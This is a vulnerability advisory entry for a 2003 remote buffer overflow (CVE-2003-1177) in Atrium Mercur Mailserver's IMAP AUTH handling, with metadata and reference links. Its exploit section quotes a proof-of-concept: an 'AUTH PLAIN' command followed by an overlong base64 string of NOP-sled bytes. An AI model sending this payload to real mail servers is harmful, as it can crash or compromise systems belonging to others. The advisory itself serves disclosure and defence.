Atrium Software Mercur Mailserver IMAP AUTH Remote Buffer Overflow Vulnerability

Vulnerability ID: 1107539
Vulnerability type: Boundary condition error
Published: 2003-10-20
Updated: 2005-10-20
CVE ID: CVE-2003-1177
CNNVD-ID: CNNVD-200312-089
Platform: Windows
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/23267
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-089
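|Vulnerability details
Atrium Software Mercur Mailserver is a mail server program. Mercur Mailserver has a flaw in its handling of the IMAP AUTH command; a remote attacker can exploit this vulnerability to carry out a buffer overflow attack and possibly execute arbitrary instructions on the system with the privileges of the service process. An attacker can trigger the vulnerability by submitting an overly long IMAP AUTH command. No detailed vulnerability information is currently available.
|Vulnerability EXP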
source: http://www.securityfocus.com/bid/8861/info

A problem has been reported in MERCUR Mailserver when handling the IMAP AUTH command. The issue occurs when an overly long command is submitted, which may be due to a buffer overrun. This problem may make it possible for an attacker to gain unauthorized access to a vulnerable system. 

On the IMAP port:

AUTH PLAIN
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
|References

Source: SECUNIA
Name: 10038
Link: http://secunia.com/advisories/10038
Source: XF
Name: mercur-auth-command-dos(13468)
Link: http://xforce.iss.net/xforce/xfdb/13468
Source: BID
Name: 8889
Link: http://www.securityfocus.com/bid/8889
Source: BID
Name: 8861
Link: http://www.securityfocus.com/bid/8861
Source: www.securiteam.com
Link: http://www.securiteam.com/windowsntfocus/6U00N1P8KC.html
Source: OSVDB
Name: 2688
Link: http://www.osvdb.org/2688
Source: FULLDISC
Name: 20031024 Vulnerability in MERCUR Mail Server v4.2 SP3 and below
Link: http://archives.neohapsis.com/archives/fulldisclosure/2003-q4/1459.html
Source: www.atrium-software.com
Link: http://www.atrium-software.com/mail%20server/pub/mcr42sp3a.html
Source: NSFOCUS
Name: 5577
Link: http://www.nsfocus.net/vulndb/5577